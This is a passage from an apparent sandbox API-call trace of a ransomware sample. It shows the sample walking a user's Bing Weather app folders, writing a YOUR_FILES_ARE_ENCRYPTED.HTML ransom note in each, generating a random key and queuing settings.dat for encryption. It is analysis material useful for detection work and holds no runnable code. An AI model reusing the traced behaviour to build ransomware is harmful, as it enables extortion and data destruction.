hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.470] GetProcessHeap () returned 0x600000 [0115.470] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.470] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1ec095fd, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1ec095fd, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1ec55a68, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0115.470] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.470] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 165 [0115.470] GetProcessHeap () returned 0x600000 [0115.470] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.470] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Microsoft.BingWeather_4.6.169.0_x86__8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingweather_8wekyb3d8bbwe\\microsoft.bingweather_4.6.169.0_x86__8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.471] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.472] CloseHandle (hObject=0x32c) returned 1 [0115.472] GetProcessHeap () returned 0x600000 [0115.472] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.472] GetProcessHeap () returned 0x600000 [0115.472] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.474] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4fed09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c4fed09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c4fed09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0115.474] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.474] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\RoamingState") returned 97 [0115.474] GetProcessHeap () returned 0x600000 [0115.474] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.474] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\RoamingState" [0115.474] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\RoamingState\\*" [0115.474] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4fed09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c4fed09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c4fed09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0115.475] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4fed09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c4fed09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c4fed09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName="..", cAlternateFileName="")) returned 1 [0115.475] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4fed09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c4fed09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c4fed09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName="..", cAlternateFileName="")) returned 0 [0115.475] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0115.475] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0115.475] GetProcessHeap () returned 0x600000 [0115.475] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.475] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingweather_8wekyb3d8bbwe\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.476] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.477] CloseHandle (hObject=0x32c) returned 1 [0115.477] GetProcessHeap () returned 0x600000 [0115.477] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.477] GetProcessHeap () returned 0x600000 [0115.477] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.477] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4fed09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c524ee5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c524ee5, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0115.477] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.477] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Settings") returned 93 [0115.477] GetProcessHeap () returned 0x600000 [0115.477] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.477] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Settings" [0115.477] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Settings\\*" [0115.478] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4fed09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c524ee5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c524ee5, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName=".", cAlternateFileName="")) returned 0x626978 [0115.478] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4fed09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c524ee5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c524ee5, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName="..", cAlternateFileName="")) returned 1 [0115.478] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c524ee5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c524ee5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c524ee5, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0115.478] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.478] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 106 [0115.478] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0115.478] lstrlenW (lpString=".lock") returned 5 [0115.478] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0115.478] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c524ee5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c524ee5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0115.478] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.478] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Settings\\settings.dat") returned 106 [0115.478] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0115.478] lstrlenW (lpString=".dat") returned 4 [0115.478] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0115.478] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0115.478] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingweather_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x324 [0115.479] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0115.479] GetProcessHeap () returned 0x600000 [0115.479] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0115.482] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="3D") returned 2 [0115.482] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="50") returned 2 [0115.482] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="3C") returned 2 [0115.482] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="FD") returned 2 [0115.482] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="5E") returned 2 [0115.482] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="E4") returned 2 [0115.482] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="FB") returned 2 [0115.482] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="58") returned 2 [0115.482] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="1C") returned 2 [0115.482] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="D2") returned 2 [0115.482] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="D4") returned 2 [0115.482] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="DC") returned 2 [0115.482] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="E7") returned 2 [0115.482] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="61") returned 2 [0115.482] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="9E") returned 2 [0115.482] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="ED") returned 2 [0115.482] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="DE") returned 2 [0115.482] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="F3") returned 2 [0115.482] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="BC") returned 2 [0115.482] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="93") returned 2 [0115.482] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="0C") returned 2 [0115.482] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="20") returned 2 [0115.482] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="7B") returned 2 [0115.482] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="4F") returned 2 [0115.482] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="93") returned 2 [0115.482] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="4D") returned 2 [0115.482] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="C2") returned 2 [0115.482] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="E8") returned 2 [0115.482] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="7C") returned 2 [0115.482] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="6E") returned 2 [0115.482] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="3A") returned 2 [0115.482] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="47") returned 2 [0115.483] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Settings\\settings.dat" [0115.483] CreateIoCompletionPort (FileHandle=0x324, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0115.483] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0115.483] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c524ee5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c524ee5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0115.483] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0115.483] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0115.483] GetProcessHeap () returned 0x600000 [0115.483] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.483] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingweather_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.499] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.500] CloseHandle (hObject=0x32c) returned 1 [0115.501] GetProcessHeap () returned 0x600000 [0115.501] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.501] GetProcessHeap () returned 0x600000 [0115.501] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.501] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c524ee5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c524ee5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c524ee5, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0115.501] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.501] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\SystemAppData") returned 98 [0115.501] GetProcessHeap () returned 0x600000 [0115.502] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.503] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\SystemAppData" [0115.503] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\SystemAppData\\*" [0115.503] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c524ee5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c524ee5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c524ee5, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.503] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c524ee5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c524ee5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c524ee5, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName="..", cAlternateFileName="")) returned 1 [0115.503] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c524ee5, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c524ee5, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c524ee5, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ed9a, dwReserved1=0x62ecf0, cFileName="..", cAlternateFileName="")) returned 0 [0115.503] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.503] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 128 [0115.503] GetProcessHeap () returned 0x600000 [0115.503] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.504] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.BingWeather_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.bingweather_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.504] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.505] CloseHandle (hObject=0x32c) returned 1 [0115.505] GetProcessHeap () returned 0x600000 [0115.506] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.506] GetProcessHeap () returned 0x600000 [0115.506] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.506] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1c4fed09, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1c4fed09, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1c4fed09, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0115.506] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.506] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: 